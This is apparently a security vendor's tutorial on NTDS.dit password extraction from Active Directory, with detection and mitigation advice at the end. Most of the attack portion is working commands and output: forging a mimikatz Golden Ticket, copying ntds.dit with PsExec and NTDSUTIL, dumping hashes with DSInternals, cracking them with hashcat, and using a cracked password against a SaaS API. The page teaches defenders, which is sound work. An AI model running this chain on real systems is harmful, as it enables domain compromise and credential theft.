NTDS.dit Password Extraction Attack

All data in Active Directory is stored in the file ntds.dit (“the dit”) on every domain controller (in C:\Windows\NTDS\ by default). Attackers can use the password hashes direct from the dit to advance objectives. Cracking user passwords is beneficial even if an adversary has already obtained domain dominance, as users frequently re-use passwords across domain-joined and non-domain-joined systems and applications.

To gain access to the ntds.dit file on a domain controller, an adversary must have already gained administrator access to Active Directory. Alternatively, an adversary could compromise the enterprise backup solution responsible for backing up domain controllers and copy ntds.dit from a backup. Most organizations do not frequently rotate the krbtgt secret (see the Golden Ticket attack) so even older backups can be useful.

Threat Summary

Target: Active Directory

Tools: DSInternals, ntdsxtract, PowerSploit, mimikatz

ATT&CK® Tactic: Credential Access

ATT&CK Technique: T1003.003

Difficulty

Detection: Medium

Mitigation: Medium

Response: Hard

Attack Tutorial: How NTDS.dit Password Extraction Works

STEP 1: Obtain required privileges

An adversary must possess access to a domain controller’s file system before they are able to extract ntds.dit. As this requirement makes ntds.dit extraction a late-stage attack, an adversary could use a previously compromised password hash for a domain controller’s computer account to create a Silver Ticket.
In the example below, the adversary uses mimikatz to gain access to a domain controller’s file system via a Golden Ticket.

      PS> .\mimikatz.exe "kerberos::golden /user:FakeUser1 /domain:domain.com /sid:S-1-5-21-441320023-234525631-506766575 /id:S-1-5-21-441320023-234525631-506766575-1000 /target:DC1.domain.com /service:HOST /RC4:be3710380a7600e825a2d9ef4ae0fcf0 /ptt" "misc::cmd"

User: FakeUser1

Domain: domain.com (DOMAIN)

SID: S-1-5-21-441320023-234525631-506766575

User Id: 0

Groups Id : *513 512 520 518 519

ServiceKey: be3710380a7600e825a2d9ef4ae0fcf0 - rc4_hmac_nt

Service: HOST

Target: DC1.domain.com

Lifetime: 31/07/2020 11:13:28 ; 29/07/2030 11:13:28 ; 29/07/2030 11:13:28

-> Ticket : ** Pass The Ticket **

* PAC generated

* PAC signed

* EncTicketPart generated

* EncTicketPart encrypted

* KrbCred generated

Golden ticket for 'FakeUser1 @ domain.com' successfully submitted for current session

mimikatz # misc::cmd

Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7FB1F4320

# A new command prompt window opens

C:\Windows\System32>

STEP 2: Exfiltrate ntds.dit

With access to a domain controller’s file system, the adversary can exfiltrate ntds.dit as well as the HKEY_LOCAL_MACHINE\SYSTEM registry hive, which is required to obtain the Boot Key for decrypting ntds.dit.

Note that while Active Directory is running, it maintains a file system lock on the ntds.dit file, so attempts to copy it will fail. Adversaries have multiple ways to get around this constraint; in particular, they can:

Simply stop Active Directory (though this is likely to result in being detected).
Use the Volume Shadow Copy Service (VSS) to snapshot the volume and extract ntds.dit from the snapshot.
Use a PowerShell tool like PowerSploit’s Invoke-NinjaCopy to copy the files even though they are in use.
Use a built-in tool like DSDBUtil.exe or NTDSUtil.exe to create active directory installation media files.

      PS> .\PSExec.exe \\dc1.domain.com cmd

PsExec v2.2 - Execute processes remotely

Copyright (C) 2001-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.17763.1339]

(c) 2018 Microsoft Corporation. All rights reserved.

DC1 > NTDSUTIL "Activate Instance NTDS" "IFM" "Create Full S:\Files" "q" "q"

NTDSUTIL: Activate Instance NTDS

Active instance set to "NTDS".

NTDSUTIL: IFM

ifm: Create Full S:\Files

Creating snapshot...

Snapshot set {3bacc31c-e2cb-4508-b0bf-5b4ec62f7c68} generated successfully.

Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} mounted as C:\$SNAP_202007311120_VOLUMES$\

Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} mounted as C:\$SNAP_202007311120_VOLUMEC$\

Initiating DEFRAGMENTATION mode...

Source Database: C:\$SNAP_202007311120_VOLUMES$\Windows\NTDS\ntds.dit

Target Database: S:\Files\Active Directory\ntds.dit

DefragmentationStatus (Complete)

0102030405060708090100

|----|----|----|----|----|----|----|----|----|----|

...................................................

Copying registry files...

Copying S:\Files\registry\SYSTEM

Copying S:\Files\registry\SECURITY

Snapshot {6bfb4e7a-4c5a-42d2-8bd4-cc5f368de171} unmounted.

Snapshot {328aa5f1-7f8f-4a0c-813c-573100a11e92} unmounted.

IFM media created successfully in S:\Files

ifm: q

NTDSUTIL: q

DC1 > Copy S:\Files \\wks2\Share

STEP 3: Extract the password hashes

Once the adversary has exfiltrated ntds.dit and the HKLM\SYSTEM registry hive, they no longer require access to the organization’s network. An adversary interested in cracking the passwords will often want to run a brute-force attack with a computer optimized for that purpose, but first they’ll need to extract the hashes from ntds.dit. The DSInternals PowerShell module provides the Get-BootKey and Get-ADDBAccount cmdlets for this purpose.

      $Key = Get-BootKey -SystemHiveFilePath C:\IFM\registry\SYSTEM

Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\IFM\Active Directory\ntds.dit' -All |

Format-Custom -View HashcatNT |

Out-File C:\Hashdump.txt

PS> Get-Content C:\Hashdump.txt

f8ae01fc52f45dda7baf7a67721665f1

eed224b4784bb040aab50b8856fe9f02

# --- Output Truncated --- #

STEP 4: Use the password hashes to gain further objectives

The adversary can now use the password hashes in pass-the-hash attacks within the environment (perhaps as a means of persistence). More likely, they will seek to crack these passwords for use in credential stuffing attacks against non-domain joined systems. In this example, the adversary cracks the hashes to obtain plaintext passwords and uses them to authenticate to a SaaS application’s API.

      PS> .\hashcat.exe -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1

Session..........: hashcat

Status...........: Running

Hash.Name........: NTLM

Hash.Target......: .\Hashdump.txt

Time.Started.....: Thu Aug 06 10:28:13 2020 (23 hours, 56 mins)

Time.Estimated...: Fri Aug 07 14:10:45 2020 (3 hours, 45 mins)

Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]

Guess.Charset....: -1 ?l?d?u, -2 Undefined, -3 Undefined, -4 Undefined

Guess.Queue......: 1/1 (100.00%)

Speed.#1.........:2165.2 MH/s (9.16ms) @ Accel:16 Loops:256 Thr:1024 Vec:1

Recovered........: 1/41 (2.44%) Digests

Progress.........: 189030831226880/218340105584896 (86.58%)

Rejected.........: 0/189030831226880 (0.00%)

Restore.Point....: 793149440/916132832 (86.58%)

Restore.Sub.#1...: Salt:0 Amplifier:13312-13568 Iteration:0-256

Candidates.#1....: TNAZRwMl -> FYNkI2Jx

Hardware.Mon.#1..: Temp: 84c Fan: 82% Util: 97% Core:1265MHz Mem:2504MHz Bus:16

PS> Get-Content .\cracked.txt

852e811a65d732c83214b4ff705d777a:F8qN47F1

PS># Attacker now uses the cracked passwords to authenticate with the username and password to a SaaS application's API

PS>$Username = "User1" # This is the user with the hash 852e811a65d732c83214b4ff705d777a which was cracked

PS>$Password = "F8qN47F1" # This is the password copied from cracked.txt

PS>$Object = New-Object -TypeName psobject

PS>$Object | Add-Member -MemberType NoteProperty -Name "login" -Value $Username

PS>$Object | Add-Member -MemberType NoteProperty -Name "password" -Value $Password

PS>$url = "https://service.url/api/login"

PS>$body = $Object | ConvertTo-Json

PS>$Header = @{ "accept" = "text/json"}

PS>$Response = Invoke-RestMethod -URI $url -Method POST -header $Header -Body $body -ContentType "application/json"

PS>$Headers = @{ 'Authorization' = "Bearer $Response" }

PS>$url = "https://service.url/api/DoThings"

PS>$Response = Invoke-RestMethod -Uri $url -Method Get -Headers $Headers

PS>$Response

{ "statusCode": 200, "statusMessage": "Things Done!" }

Detect, Mitigate and Respond

Detect

Difficulty: Medium

Attempts to access ntds.dit can be detected using the Windows event log. Event IDs 4663 and 4656 of the Audit File System subcategory can be used to audit file system access. Use these events to monitor for both regular and Volume Shadow Copy attempts to read or modify ntds.dit.

Mitigate

Difficulty: Medium

To mitigate the risk of password extraction from ntds.dit, use the following best practices to help ensure that adversaries do not obtain the privileges necessary to compromise domain controllers in the first place:

Routinely audit administrative access to Active Directory, including Group Policy rights and audit configuration for logons to domain controllers.
Rigorously follow the clean source principle for domain controllers: All infrastructure (e.g., ESX and attached storage) on which domain controllers reside or applications that service domain controllers (such as backup solutions) run must do so at the same security level as domain controllers themselves.
Ensure the physical security of the domain controller machines. If physical security cannot be assured, consider running read-only domain controllers to limit the exposure of passwords.
Do not allow users to possess administrative privileges across security boundaries. For example, an adversary who initially compromises a workstation should not be able to escalate privileges to move from a workstation to a server or domain controller.

Respond

Difficulty: Hard

If compromise of ntds.dit is expected, a full compromise of Active Directory must also be assumed; in particular, assume the krbtgt secret was also compromised. Take the following action:

Activate the incident response process and alert the response team. Recovery from a full compromise of Active Directory requires significant planning and effort.

Share on

View related cybersecurity attacks

Abusing Entra ID Application Permissions – How It Works and Defense Strategies

AdminSDHolder Modification – How It Works and Defense Strategies

AS-REP Roasting Attack - How It Works and Defense Strategies

Hafnium Attack - How It Works and Defense Strategies

DCSync Attacks Explained: Threat to Active Directory Security

Group Managed Service Accounts Attack

Golden SAML Attack

Understanding Golden Ticket Attacks

DCShadow Attack – How It Works, Real-World Examples & Defense Strategies

ChatGPT Prompt Injection: Understanding Risks, Examples & Prevention

Kerberoasting Attack – How It Works and Defense Strategies

Pass the Hash Attack

Pass-the-Ticket Attack Explained: Risks, Examples & Defense Strategies

Password Spraying Attack

Plaintext Password Extraction Attack

Zerologon Vulnerability Explained: Risks, Exploits and Mitigation

Active Directory Ransomware Attacks

Unlocking Active Directory with the Skeleton Key Attack

Lateral Movement: What Is It, How It Works And Preventions

Man-in-the-Middle (MITM) Attacks: What They Are & How to Prevent Them

Why Is PowerShell So Popular for Attackers?

4 Service Account Attacks and How to Protect Against Them

How to Prevent Malware Attacks from Impacting Your Business

What is Credential Stuffing?

Compromising SQL Server with PowerUpSQL

What Are Mousejacking Attacks, and How to Defend Against Them

Stealing Credentials with a Security Support Provider (SSP)

Rainbow Table Attacks: How They Work and How to Defend Against Them

LDAP Reconnaissance

Bypassing MFA with the Pass-the-Cookie Attack

Silver Ticket Attack